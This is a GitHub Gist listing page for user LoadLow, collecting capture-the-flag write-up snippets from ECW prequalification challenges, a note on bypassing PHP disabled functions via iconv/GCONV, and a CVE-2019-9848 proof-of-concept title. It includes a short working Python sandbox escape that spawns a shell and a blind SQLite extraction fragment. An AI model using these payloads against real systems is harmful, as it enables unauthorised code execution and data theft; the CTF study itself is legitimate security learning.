Skip to content

Instantly share code, notes, and snippets.

View LoadLow's full-sized avatar
🎯
Focusing

Load. LoadLow

🎯
Focusing
View GitHub Profile
@LoadLow
LoadLow / Readme.md
Last active August 14, 2023 13:55
Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())

This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

Credits: @hugeh0ge

It uses iconv, in php, in order to execute the same payload.

Uses cases :

  • You control the first parameter of iconv (in_charset), you can set an env var and you can upload arbitrary files (.so library file and the gconv-modules file) and you know their path.
  • You have a php RCE but system, shell_exec, curl_exec and other functions are disabled but you can setenv (and LD_PRELOAD is blacklisted).
@LoadLow
LoadLow / Readme.md
Last active October 21, 2019 21:22
ECW Prequals - Challenge "PLC Manager"

It was a .jar file.

We just had to decompile it, analyze a bit the protocol and find a way to write all the bits in memory to 1 instead of reading them, in order to "unlock all the doors".

@LoadLow
LoadLow / Readme.md
Last active October 21, 2019 21:15
ECW Prequals - Challenge "Sploit_Win"

Win64 PE With some protections ...

ASLR : True
DEP : True
SEH : False
CFG : False
[*] Listing imported DLLs...
        WS2_32.dll
 KERNEL32.dll
@LoadLow
LoadLow / decode.py
Last active October 21, 2019 21:13
ECW Prequals - Challenge "Puzzle"
#!/usr/bin/env python
"""
Modbus Message Parser
--------------------------------------------------------------------------
"""
from __future__ import print_function
import codecs as c
import types
@LoadLow
LoadLow / Readme.md
Last active October 22, 2019 12:33
ECW Prequals - Challenge "Mysudo"

Static binary, PIE + ASLR + NX, probably not a BoF with a shellcode

I've exploited another BoF on the mruby file format / file reader

It was easier, I just had to trigger an error to avoid the setuid that drops privileges.

@LoadLow
LoadLow / bypass.py
Last active October 21, 2019 21:14
ECW Prequals - Challenge "Matrix"
a1 = "\x73\x79\x73" # sys
a2 = "\x6f\x73" # os
a3 = "\x73\x68" # sh
a4 = "\x73\x79\x73\x74\x65\x6d" #system
a5 = getattr([].__class__.__mro__[1].__subclasses__()[104].__init__.__globals__[a1].modules[a2],a4)
a5(a3)
@LoadLow
LoadLow / blind_sqlite.js
Last active October 22, 2019 13:38
ECW Prequals - Challenge "SecureVault"
var encrypt = new JSEncrypt();
encrypt.setPublicKey($('#pubkey').val());
var fnd = false;
for(var i = 0; i < 1000; ++i) {
var asciimin = 0x20;
var asciimax = 126
var min;
import scapy
from scapy_ssl_tls.ssl_tls import *
from socket import *
cc = socket(AF_INET, SOCK_STREAM)
cc.connect(("127.0.0.1", 25))
print(str(cc.recv(1024)))
cc.send('ehlo localhost\r\n')
@LoadLow
LoadLow / Readme.md
Last active August 18, 2019 12:31
POC/MSF module for CVE-2019-9848, on dom-loaded event (triggered just after opening the document) and still working on 6.2.5
----------------------------------------------------------------------------------
-- Create Date: 09:43:04 03/16/2018
-- Design Name:
-- Module Name: ethernet_controller - Behavioral
-- Project Name: Controller
-- Description: 100mbps ethernet controller
--
-- Dependencies: lfsr25, ethernet_spec
----------------------------------------------------------------------------------
library ieee;